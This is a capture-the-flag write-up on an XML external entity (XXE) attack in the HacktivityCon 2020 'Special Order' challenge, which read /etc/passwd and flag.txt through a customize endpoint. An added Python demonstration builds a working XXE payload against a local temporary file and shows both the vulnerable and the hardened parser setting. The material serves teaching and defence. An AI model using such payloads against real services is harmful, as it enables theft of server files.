Tags: hacktivityconctf2020 xxe 

## Writeup Special Order by Ambrotd
Looking around the website, and with the second order hint from the second order equation, the only place where I found I could do something was in customize.

This was the request:

![4c77161d1306129ba6bd5948acfb6d2a.png](_resources/ddc4c3ccf81f4383ba52da1fbbac8a06.png)

Converting it to XML seems to work:

![b8a92220f58dd89a0254dd2f0fbbdec7.png](_resources/663fcb1135c544e587bae2fef75193f7.png)

And the result was saved in:

![031faa13595eb86ff95db449e842cc54.png](_resources/35bcafae6be64ecdbb62549bcbd9cf97.png)

So I tried to pull /etc/passwd:

![e0b8c387b26dc3158937ba021ad89b8d.png](_resources/2c886ac6c2074d71b0b06b21b4afbcc9.png)

And the response was in the CSS file clean-blog.css:

![808ca6e0f8cbddf2418dffac3c48d7c3.png](_resources/a104424575cc4a7284cdadad42f6da23.png)

So I tried with flag.txt:

![1779fc44a47429a6f2472e80b6d681f7.png](_resources/aecf95e371e548db94c0904a8083c1ed.png)

And I got the flag:

![a4688b647cfbb660bce1cbf00cab84d8.png](_resources/a5c352dd4be04dee987c48731c268085.png)
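The steps above boil down to one parser setting on the server: the customize endpoint accepted XML, resolved an external entity declared in the DOCTYPE, and wrote the entity's replacement text (the contents of /etc/passwd, then flag.txt) into the generated stylesheet. The challenge's server code is not shown in the writeup, so the following is an added example written for this page, not code from the challenge or from Ambrotd. It uses a hypothetical Python stand-in for the customize endpoint (`render_css`), a constructed secret file in a temporary directory standing in for flag.txt, and the `xml.sax` parser's `feature_external_ges` switch to show the vulnerable configuration next to the hardened one. (Python set this feature to off by default from 3.7.1 onward; the example sets it explicitly in both directions so the behaviour does not depend on the interpreter version.)

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample secret standing in for the challenge's flag.txt.
SECRET = "flag{constructed_sample_flag}"


class CustomizeHandler(ContentHandler):
    """Collects the text of each child element of <customize>, e.g. <color>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "customize":
            self._current = name
            self.fields.setdefault(name, "")

    def endElement(self, name):
        self._current = None

    def characters(self, content):
        # Entity replacement text is delivered here as ordinary character
        # data, which is how a file's contents end up inside the CSS value.
        if self._current is not None:
            self.fields[self._current] += content


def render_css(xml_bytes, resolve_external_entities):
    """Hypothetical stand-in for the customize endpoint: parse the XML order
    and write the chosen colour into a stylesheet, the way the challenge
    wrote its result into clean-blog.css."""
    parser = xml.sax.make_parser()
    # This single feature is the difference between the vulnerable service
    # (external general entities resolved) and the hardened one (ignored).
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = CustomizeHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "body { background-color: %s; }\n" % handler.fields.get("color", "")


def xxe_payload(target_uri):
    """XML order whose <color> value is an external entity reading target_uri."""
    template = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE customize [\n"
        '  <!ENTITY xxe SYSTEM "{uri}">\n'
        "]>\n"
        "<customize><color>&xxe;</color></customize>\n"
    )
    return template.format(uri=target_uri).encode()


def demo():
    """Send the same payload to both parser configurations.

    Returns (leaked, safe): the CSS produced by the vulnerable parser, which
    contains the secret, and by the hardened parser, which does not.
    """
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "flag.txt")  # constructed, not the real flag
        with open(secret_path, "w") as fh:
            fh.write(SECRET + "\n")
        payload = xxe_payload(pathlib.Path(secret_path).as_uri())  # file:///...
        leaked = render_css(payload, resolve_external_entities=True)
        safe = render_css(payload, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser wrote:", leaked, end="")
    print("hardened parser wrote:  ", safe, end="")
```

The payload is the same shape as the one in the screenshots: a DOCTYPE with `<!ENTITY xxe SYSTEM "file:///...">` and `&xxe;` placed in a field the server echoes back. Running the block prints the secret inside the stylesheet for the vulnerable configuration and an empty colour value for the hardened one. Disabling external general entities is the minimum fix; rejecting any request that carries a DOCTYPE at all is the stricter and more common hardening, since the endpoint never needs one.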

Original writeup (https://github.com/Ambrotd/hacktivitycon/blob/master/Special%20Order/Special%20Order.md).